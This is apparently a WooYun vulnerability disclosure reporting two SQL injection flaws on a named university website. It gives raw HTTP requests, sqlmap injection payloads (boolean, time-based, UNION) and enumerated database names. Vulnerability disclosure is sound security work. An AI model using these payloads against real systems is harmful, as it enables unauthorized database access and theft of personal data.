乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-20: 细节已通知厂商并且等待厂商处理中 2015-12-21: 厂商已经确认,细节仅向厂商公开 2015-12-31: 细节向核心白帽子及相关领域专家公开 2016-01-10: 细节向普通白帽子公开 2016-01-20: 细节向实习白帽子公开 2016-02-01: 细节向公众公开
当你迷茫、失望、浮躁、悲伤、绝望的时候,不要灰心,我只想让你知道:世界和我爱着你!
POST数据包:
POST /se/shiyanban2.php HTTP/1.1X-Forwarded-For: 8.8.8.8'Content-Length: 327Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://econ.sufe.edu.cn:80/Cookie: PHPSESSID=veicn0egtruldtc4bnbn97nf01Host: econ.sufe.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*tijiao=%e6%8f%90%e4%ba%a4&dianhua=1&dizhi=1&gaokao=1&gaozhong=1&geren=1&jiangli=1&jiazhang=1&jzdianhua=1&shenfenid=&shengyuan=1&xingbie=%e5%a5%b3&xingming=1&xuehao=1&xuexi=1&youxiang=1&yuanxi=1
其中参数 shenfenid 可注入
由于数据库跟 (http://www.wooyun.org/bugs/wooyun-2015-0162743) 一样 这里就不截图了 看了下数据库权限
POST parameter 'shenfenid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 2152 HTTP(s)requests:---Parameter: shenfenid (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tijiao=%e6%8f%90%e4%ba%a4&dianhua=1&dizhi=1&gaokao=1&gaozhong=1&geren=1&jiangli=1&jiazhang=1&jzdianhua=1&shenfenid=' AND 3366=3366 AND 'LxCT'='LxCT&shengyuan=1&xingbie=%e5%a5%b3&xingming=1&xuehao=1&xuexi=1&youxiang=1&yuanxi=1 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: tijiao=%e6%8f%90%e4%ba%a4&dianhua=1&dizhi=1&gaokao=1&gaozhong=1&geren=1&jiangli=1&jiazhang=1&jzdianhua=1&shenfenid=' AND (SELECT * FROM (SELECT(SLEEP(5)))UoJl) AND 'xoza'='xoza&shengyuan=1&xingbie=%e5%a5%b3&xingming=1&xuehao=1&xuexi=1&youxiang=1&yuanxi=1---[17:46:42] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[17:46:42] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.4back-end DBMS: MySQL 5.0.12[17:46:42] [INFO] fetching database names[17:46:42] [INFO] fetching number of databases[17:46:42] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[17:46:42] [INFO] retrieved: 8[17:46:46] [INFO] retrieved: information_schema[17:47:50] [INFO] retrieved: mysql[17:48:12] [INFO] retrieved: performance_schema[17:49:20] [INFO] retrieved: sakila[17:49:41] [INFO] retrieved: shufe[17:50:07] [INFO] retrieved: sufe[17:50:24] [INFO] retrieved: test[17:50:40] [INFO] retrieved: worldavailable databases [8]:[*] information_schema[*] mysql[*] performance_schema[*] sakila[*] shufe[*] sufe[*] test[*] world[17:51:02] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\econ.sufe.edu.cn'[*] shutting down at 17:51:02
0x02数据包:
GET /se/sz/szdw_con.php?id=-1&xibie=3 HTTP/1.1X-Forwarded-For: 8.8.8.8'X-Requested-With: XMLHttpRequestReferer: http://econ.sufe.edu.cn:80/Cookie: PHPSESSID=veicn0egtruldtc4bnbn97nf01Host: econ.sufe.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
参数 ID 可注入
看了下数据量
然后看了下权限 DBA权限
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 400 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: http://econ.sufe.edu.cn:80/se/sz/szdw_con.php?id=-2126 OR 8984=8984&xibie=3 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (SELECT) Payload: http://econ.sufe.edu.cn:80/se/sz/szdw_con.php?id=-1 OR (SELECT * FROM (SELECT(SLEEP(5)))dMfI)&xibie=3 Type: UNION query Title: MySQL UNION query (random number) - 18 columns Payload: http://econ.sufe.edu.cn:80/se/sz/szdw_con.php?id=-1 UNION ALL SELECT 2121,2121,2121,2121,2121,2121,2121,CONCAT(0x717a706a71,0x6b6973726c6d714d7978,0x717a6a7171),2121,2121,2121,2121,2121,2121,2121,2121,2121,2121#&xibie=3---[17:44:57] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[17:44:57] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.4back-end DBMS: MySQL 5.0.12[17:44:57] [INFO] fetching database names[17:44:59] [INFO] the SQL query used returns 8 entries[17:44:59] [INFO] starting 8 threads[17:45:00] [INFO] retrieved: world[17:45:00] [INFO] retrieved: sakila[17:45:00] [INFO] retrieved: performance_schema[17:45:01] [INFO] retrieved: mysql[17:45:01] [INFO] retrieved: test[17:45:01] [INFO] retrieved: sufe[17:45:02] [INFO] retrieved: information_schema[17:45:02] [INFO] retrieved: shufeavailable databases [8]:[*] information_schema[*] mysql[*] performance_schema[*] sakila[*] shufe[*] sufe[*] test[*] world[17:45:02] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\econ.sufe.edu.cn'[*] shutting down at 17:45:02
危害等级:高
漏洞Rank:12
确认时间:2015-12-21 08:29
感谢提醒,已通知负责人进行处理
暂无